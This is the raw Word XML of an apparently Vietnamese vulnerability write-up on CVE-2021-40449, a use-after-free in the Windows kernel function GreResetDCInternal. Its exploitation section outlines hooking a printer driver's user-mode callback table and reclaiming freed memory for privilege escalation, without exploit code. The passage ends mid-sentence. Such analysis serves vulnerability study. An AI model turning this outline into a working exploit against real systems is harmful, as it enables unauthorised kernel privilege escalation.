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6DC23" w14:textId="77777777" w:rsidR="005978B0" w:rsidRPr="00D040A0" w:rsidRDefault="005978B0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D040A0">
        <w:rPr>
          <w:rFonts w:eastAsia="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CVE-2021-40449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A848D6A" w14:textId="71346934" w:rsidR="00A23A33" w:rsidRDefault="00AD6B7E" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>I)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F6408C">
        <w:t>Bug overvi</w:t>
      </w:r>
      <w:r>
        <w:t>ew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042D6BF" w14:textId="1987CE0D" w:rsidR="00DE3FCA" w:rsidRDefault="00DE3FCA" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve">Lỗ hổng xảy ra </w:t>
      </w:r>
      <w:r w:rsidR="002814D0">
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> hàm GreResetDCInternal</w:t>
      </w:r>
      <w:r w:rsidR="002814D0">
        <w:t xml:space="preserve"> trong win32kfull.sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve">, hàm này sẽ lấy con trỏ hàm trong </w:t>
      </w:r>
      <w:r w:rsidR="002814D0">
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> DC và thực thi hàm do con trỏ hàm trỏ tới</w:t>
      </w:r>
      <w:r w:rsidR="002814D0">
        <w:t xml:space="preserve"> ở user mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve">, nhưng không kiểm tra </w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> DC. </w:t>
      </w:r>
      <w:r>
        <w:t>Khi</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> giải phóng đối tượng DC trước </w:t>
      </w:r>
      <w:r>
        <w:t>lúc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> gọi con trỏ hàm và </w:t>
      </w:r>
      <w:r>
        <w:t>sử dụng lại bộ nhớ được cấp phát</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>ta có thể</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3FCA">
        <w:t xml:space="preserve"> sửa đổi con trỏ hàm của đối tượng DC ban đầu để trỏ đến bất kỳ hàm kernel nào trong GreResetDCInternal bằng cách xây dựng </w:t>
      </w:r>
      <w:r w:rsidR="00FB6928">
        <w:t>một forge memory layout</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA46E4" w14:textId="61D59A59" w:rsidR="00FB6928" w:rsidRDefault="00FB6928" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>II)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FB6928">
        <w:t>Vulnerability analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B47915" w14:textId="1E7DA34E" w:rsidR="0051447D" w:rsidRDefault="0051447D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Đầu tiên hàm tạo một DCO object mới từ HDC truyền vào sau đó lấy PDEVOBJ ở offset 30h</w:t>
      </w:r>
      <w:r w:rsidR="00FD53C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40721FE8" w14:textId="4EC9CEB6" w:rsidR="00FB6928" w:rsidRDefault="005D21B1" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AFA3F3" wp14:editId="3E5E9D6A">
            <wp:extent cx="6188710" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92227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798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9B61" w14:textId="5B6CCD4D" w:rsidR="0051447D" w:rsidRPr="00140F66" w:rsidRDefault="0051447D" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gọi hàm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0051447D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hdcOpenDCW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0051447D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>để tạo DC object mới</w:t>
      </w:r>
      <w:r w:rsidR="00E1208F">
        <w:t>. Lỗ hổng được tạo ra do hàm này vì nó có chức năng gọi lại chế độ user mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE79C9" w14:textId="6F596D54" w:rsidR="00140F66" w:rsidRPr="0051447D" w:rsidRDefault="00565574" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Khi tạo một handle mới tạo bằng hàm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0051447D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hdcOpenDCW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0051447D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00471A26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471A26">
        <w:t xml:space="preserve">thì không hề có sự kiểm tra về </w:t>
      </w:r>
      <w:r w:rsidR="00E178B9">
        <w:t>oldDC object</w:t>
      </w:r>
      <w:r w:rsidR="00471A26">
        <w:t xml:space="preserve"> đang được sử dụng, và </w:t>
      </w:r>
      <w:r w:rsidR="00471A26" w:rsidRPr="00471A26">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>có khả năng hdc đó đã được free</w:t>
      </w:r>
      <w:r w:rsidR="00471A26">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00471A26">
        <w:t>=&gt; Lỗi use after free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D92CA9" w14:textId="4E000834" w:rsidR="002A5035" w:rsidRDefault="005D21B1" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DD08734" wp14:editId="04297FA4">
            <wp:extent cx="6188710" cy="3091815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="192050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037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C320" w14:textId="586B77F8" w:rsidR="005D21B1" w:rsidRDefault="005D21B1" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE63AAA" wp14:editId="127D9AA8">
            <wp:extent cx="6188710" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127119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929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115A" w14:textId="2BD91596" w:rsidR="00F2673D" w:rsidRDefault="00B65E2B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00A70DDB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>free old</w:t>
      </w:r>
      <w:r w:rsidR="006644D7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidR="00A70DDB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> object và sử dụng lại bộ nhớ đã cấp phát</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, sửa đổi nội dung của con trỏ hàm bên trong và để </w:t>
      </w:r>
      <w:r w:rsidR="00A70DDB">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực thi con trỏ hàm trong DC </w:t>
      </w:r>
      <w:r w:rsidR="006644D7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, thì có thể đạt được </w:t>
      </w:r>
      <w:r w:rsidR="003471A0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mục đích</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép </w:t>
      </w:r>
      <w:r w:rsidR="003471A0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="006D6DFF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>leo thang đặc quyền</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5035">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B53B4" w14:textId="77777777" w:rsidR="000E6CBE" w:rsidRDefault="000E6CBE" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>III) Vulnerability Exploitation Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DF03C" w14:textId="04FA8E2F" w:rsidR="00265588" w:rsidRDefault="00265588" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r>
        <w:t>Để khai thác được lỗ hổng này, mục tiêu là để kernel callback con trỏ hàm của DC object sau khi giải phóng DC.</w:t>
      </w:r>
      <w:r w:rsidR="0033420C">
        <w:t xml:space="preserve"> Tóm gọn lại ta cần có các bước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14A495" w14:textId="19BDC09D" w:rsidR="0033420C" w:rsidRDefault="0033420C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hooking tới một </w:t>
      </w:r>
      <w:r w:rsidR="00192084">
        <w:t>usermode-callback</w:t>
      </w:r>
      <w:r w:rsidR="00F961B3">
        <w:t xml:space="preserve"> và trigger UAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC5908" w14:textId="54FE0200" w:rsidR="0033420C" w:rsidRDefault="0033420C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng lại không gian bộ nhớ đã cấp phát cho DC object đã được free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B306BAA" w14:textId="7C8A9604" w:rsidR="0033420C" w:rsidRDefault="0033420C" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hoàn thành forge memory layout để thực thi hàm gọi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4D606" w14:textId="6E6BD0DF" w:rsidR="0033420C" w:rsidRDefault="00E0497B" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1)   </w:t>
      </w:r>
      <w:r w:rsidR="0033420C">
        <w:t>Hooking tới một usermode call back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51220819" w14:textId="007E3558" w:rsidR="0033420C" w:rsidRDefault="00465BDA" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r>
        <w:t>Để tạo và hook tới một Device Context, ta có theo các bước sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CED6D1" w14:textId="154D2202" w:rsidR="00465BDA" w:rsidRDefault="00465BDA" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00465BDA">
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>EnumPrinters</w:t>
      </w:r>
      <w:r w:rsidRPr="00465BDA">
        <w:t xml:space="preserve"> để tìm </w:t>
      </w:r>
      <w:r>
        <w:t>printer</w:t>
      </w:r>
      <w:r w:rsidRPr="00465BDA">
        <w:t xml:space="preserve"> có sẵn</w:t>
      </w:r>
      <w:r w:rsidR="004C40B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47885481" w14:textId="04106BEA" w:rsidR="004C40B0" w:rsidRDefault="004C40B0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05089673" wp14:editId="261F8940">
            <wp:extent cx="6188710" cy="2372360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205900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002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72360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:effectLst>
                      <a:glow>
                        <a:schemeClr val="accent1">
                          <a:alpha val="40000"/>
                        </a:schemeClr>
                      </a:glow>
                      <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="43137"/>
                        </a:srgbClr>
                      </a:outerShdw>
                      <a:reflection endPos="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5E070FE" w14:textId="000AA86E" w:rsidR="00465BDA" w:rsidRDefault="00567292" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OpenPrinter</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> để lấy handle của </w:t>
      </w:r>
      <w:r>
        <w:t>printer</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve">, sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GetPrinterDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> để lấy thông tin </w:t>
      </w:r>
      <w:r>
        <w:t>cần thiết</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LoadLibraryExA</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> tải </w:t>
      </w:r>
      <w:r>
        <w:t>printer driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> vào không gian địa chỉ của tiến trình hiện tại</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D592A5D" w14:textId="19E8D96E" w:rsidR="004C40B0" w:rsidRDefault="004C40B0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A39884E" wp14:editId="620FF9A3">
            <wp:extent cx="6188710" cy="3729355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="189041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13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3814" w14:textId="7932C79D" w:rsidR="00567292" w:rsidRDefault="00567292" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> để lấy địa chỉ chức năng của </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DrvEnableDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">và sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DrvEnableDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">có được bảng </w:t>
      </w:r>
      <w:r w:rsidR="00192084">
        <w:t>usermode-callback</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34254777" w14:textId="5D436224" w:rsidR="004C40B0" w:rsidRDefault="004C40B0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D18E5CD" wp14:editId="58072861">
            <wp:extent cx="6188710" cy="2738755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124120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074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0207" w14:textId="50D4E203" w:rsidR="00567292" w:rsidRDefault="00567292" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C40B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>VirtualProtect</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> để </w:t>
      </w:r>
      <w:r w:rsidR="00023B71">
        <w:t>gỡ bỏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> bảo vệ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bảng </w:t>
      </w:r>
      <w:r w:rsidR="00192084">
        <w:t>usermode-callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> của trình </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">printer driver </w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidR="00192084">
        <w:t>, từ đó</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> có thể thay thế nó bằng một con trỏ chức năng gọi lại tùy </w:t>
      </w:r>
      <w:r w:rsidR="00192084">
        <w:t>ý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41831147" w14:textId="0C4F7BA8" w:rsidR="00192084" w:rsidRDefault="00192084" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00192084">
        <w:t xml:space="preserve">Ghi đè </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidR="00023B71">
        <w:t>entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00192084">
        <w:t xml:space="preserve"> được chỉ định trong bảng </w:t>
      </w:r>
      <w:r>
        <w:t>usermode-callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00567292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192084">
        <w:t>và khôi phục chức năng bảo vệ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> callback table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A0585" w14:textId="76016360" w:rsidR="004C40B0" w:rsidRDefault="004C40B0" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4E4D7E" wp14:editId="27F3EFB0">
            <wp:extent cx="6188710" cy="3854450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94249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912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BD70" w14:textId="1F767AA8" w:rsidR="00192084" w:rsidRDefault="00F342B1" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Xây dựng được</w:t>
      </w:r>
      <w:r w:rsidRPr="00F342B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fake callback function</w:t>
      </w:r>
      <w:r w:rsidRPr="00F342B1">
        <w:t xml:space="preserve"> và gọi lại</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hàm đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3336F3" w14:textId="7931B205" w:rsidR="00C5479F" w:rsidRDefault="00CB1995" w:rsidP="00A67CF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì sao lại sử dụng hook </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00567292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DrvEnableDriver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B5C38">
